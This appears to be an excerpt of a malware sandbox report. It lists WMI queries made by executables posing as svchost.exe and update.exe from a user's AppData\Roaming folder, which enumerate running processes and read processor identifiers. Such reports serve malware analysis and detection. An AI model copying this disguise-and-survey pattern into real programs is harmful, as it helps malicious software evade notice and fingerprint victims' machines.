                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
